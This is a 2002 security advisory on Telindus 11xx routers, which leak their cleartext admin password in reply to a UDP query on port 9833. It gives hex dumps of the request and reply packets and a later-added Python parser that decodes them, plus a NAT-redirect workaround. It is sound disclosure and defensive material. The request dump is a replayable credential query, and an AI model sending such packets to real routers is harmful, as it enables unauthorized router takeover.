10th Jun 2002 [SBWID-5419]
COMMAND
Telindus 11xx router series vulnerabilities
SYSTEMS AFFECTED
Telindus 11xx router series
PROBLEM
finelli@ieee.org and kurgan@tigerteam.it found the following:
The 11xx router series by Telindus (http://www.telindus.com) has a very
serious, remotely exploitable vulnerability: an intruder can mimic the
behaviour of the desktop management application and thereby take control
of the router.
The 11xx router series has a management program, freely downloadable
from the Telindus site, that allows the router to be administered
remotely. The program first tries to discover router boxes on the LAN
through a UDP broadcast. It then sends a different UDP unicast packet to
each box that answered, and the router replies with a UDP packet that
contains, among other things, the software revision number, the router
name and the password for accessing the device.
All of this information is in clear text. All of the traffic takes place
on UDP port 9833.
This behaviour can be exploited in a billion ways: on a LAN it is enough
to download and run the administration tool while simply sniffing the
traffic. On a WAN it is enough to craft a hand-made packet that queries
the router in the same way the management program does.
As an example, this is the complete dump (with the Ethernet frame) of a
"request" packet. The payload is the last 62 bytes, beginning from
"19 73 04"; the sender address is 172.16.0.16 and the router
(recipient) is 172.16.0.253:
00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF
This is the dump of an "answer" packet (with the Ethernet frame). The
payload is the last 204 bytes, beginning from "19 73 04". The password
has been replaced by "x":
00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00
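As an added example (it is not part of the original advisory, and not code from Telindus or from the authors), the following Python script decodes the two dumps above: it parses the Ethernet, IPv4 and UDP headers, checks the IPv4 header checksum, confirms that both sides use port 9833 (0x2669), and then splits the data into attributes. Two things in it are assumptions rather than facts stated on the page: the attribute layout (a 6-byte preamble, a 4-byte header, then in the request a list of 2-byte tags closed by FF FF and in the reply tag/length/value triples for the same tags in the same order) is inferred from the two dumps, not from vendor documentation; and the 13 masked "xx" password bytes are replaced with the placeholder byte 0x78 so the reply stays parseable. The 62 and 204 quoted above are the UDP lengths with the 8-byte UDP header included; the data starting at "19 73 04" is 54 and 196 bytes respectively, which the script checks. All function names are the example's own.

```python
import struct

# Dumps copied from the advisory; the 13 masked "xx" password bytes become the placeholder 0x78 ("x").
REQUEST_DUMP = """
00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF
"""
REPLY_DUMP = """
00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00
"""

MGMT_PORT = 9833
# The payload layout below is INFERRED from the two dumps, not taken from vendor documentation.
PREAMBLE = bytes.fromhex("197304177330")   # first 6 payload bytes of both messages
REQUEST_KIND, REPLY_KIND = 0x0001, 0x0003  # payload bytes 6-7; FF FF closes the request's tag list

def dump_to_bytes(dump):
    """Hexdump text to bytes; the masked "xx" tokens become 0x78."""
    return bytes(0x78 if tok == "xx" else int(tok, 16) for tok in dump.split())

def ip_checksum_ok(header):
    """RFC 791: the one's-complement sum of all header words is 0xFFFF when the header is intact."""
    total = sum(struct.unpack(">%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF

def parse_frame(frame):
    """Ethernet II -> IPv4 -> UDP; returns addressing and the UDP data."""
    if struct.unpack(">H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 17:
        raise ValueError("not UDP")
    if not ip_checksum_ok(ip[:ihl]):
        raise ValueError("bad IPv4 header checksum")
    sport, dport, ulen, _csum = struct.unpack(">HHHH", ip[ihl:ihl + 8])
    return {"src": ".".join(map(str, ip[12:16])), "dst": ".".join(map(str, ip[16:20])),
            "sport": sport, "dport": dport, "payload": ip[ihl + 8:ihl + ulen]}  # ulen counts the UDP header

def parse_payload(payload):
    """Split a 9833/udp message into its kind and its attributes (inferred layout)."""
    if payload[:6] != PREAMBLE:
        raise ValueError("unexpected preamble")
    kind = struct.unpack(">H", payload[6:8])[0]
    body = payload[10:]
    if kind == REQUEST_KIND:
        tags, pos = [], 0
        while pos + 2 <= len(body):
            tag = struct.unpack(">H", body[pos:pos + 2])[0]
            pos += 2
            if tag == 0xFFFF:
                break
            tags.append(tag)
        return {"kind": "request", "tags": tags}
    if kind != REPLY_KIND:
        raise ValueError("unknown message kind 0x%04x" % kind)
    attrs, pos = [], 0
    while pos + 4 <= len(body):
        tag, length = struct.unpack(">HH", body[pos:pos + 4])
        if pos + 4 + length > len(body):
            raise ValueError("truncated attribute 0x%04x" % tag)
        attrs.append((tag, body[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return {"kind": "reply", "attrs": attrs}

def cleartext_fields(attrs):
    """Attributes whose value is printable ASCII: readable by any listener on the segment, no decoding needed."""
    return [(tag, v.decode("ascii")) for tag, v in attrs
            if v and all(0x20 <= b < 0x7F for b in v)]

def decode_advisory_dumps():
    """Parse both frames and collect the facts a reviewer of such a capture checks."""
    req, rep = (parse_frame(dump_to_bytes(d)) for d in (REQUEST_DUMP, REPLY_DUMP))
    req_msg, rep_msg = parse_payload(req["payload"]), parse_payload(rep["payload"])
    ports = (req["sport"], req["dport"], rep["sport"], rep["dport"])
    return {"hosts": (req["src"], req["dst"], rep["src"], rep["dst"]), "ports": ports,
            "on_mgmt_port": all(p == MGMT_PORT for p in ports),
            "payload_lengths": (len(req["payload"]), len(rep["payload"])),
            "request_tags": req_msg["tags"], "reply_tags": [t for t, _ in rep_msg["attrs"]],
            "cleartext": cleartext_fields(rep_msg["attrs"])}
```

Calling decode_advisory_dumps() returns the addresses, the ports, the tag lists of both messages (which match one-for-one) and the three attributes whose values are printable text: the router name, the masked password field and the version banner. The same parser, fed frames from a capture on the perimeter, is a direct way to confirm whether a filter on 9833/udp is actually stopping this traffic.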
SOLUTION
We have not been able to determine whether this "feature" can be
disabled. Failing that, it seems that the only solution is to filter
the traffic on UDP port 9833 directed to the box.
A quick and dirty workaround is to redirect WAN traffic to port
9833/udp to another IP address on the LAN, preferably an unused one.
This can be achieved by telnetting to the router, logging in, and
issuing the following command: "add auto udp 9833 9833 9833
10.0.0.10", where 10.0.0.10 is some unused IP address on your LAN.
This sets up a static NAT rule that redirects traffic entering the WAN
interface. You must then also enter the command "save" to store your
configuration in NVRAM. You can optionally check the status of the
NAT table by issuing "show auto". If you made a mistake, you can
"del auto <number>" and then retry. There may be better methods; we
used this one because we already knew how to use the "auto" command.
Notes
=====
We contacted Telindus through their Italian office. They told us that
they are actively working on this issue. We told them that after a
month we would inform the security community of the problem.
Telindus told us that a beta version of the firmware should be
available soon. Last but not least, the banner of the router contains
the word Arescom, so perhaps other devices from that vendor are
exploitable: we have none at our disposal, so we have not been able
to check.
Disclaimer
==========
Strangely enough, we have been able to discover this problem in spite of
the DMCA and similar initiatives, since we did not even need to reverse
engineer the code of any application: we were simply monitoring the
network for totally unrelated issues and happened to log a "strange
communication" on UDP port 9833. Notice that the payload is in
clear text and that the juxtaposition of the router name and a text
string leaves little to the imagination.
(C) 2002 finelli@ieee.org, kurgan@tigerteam.it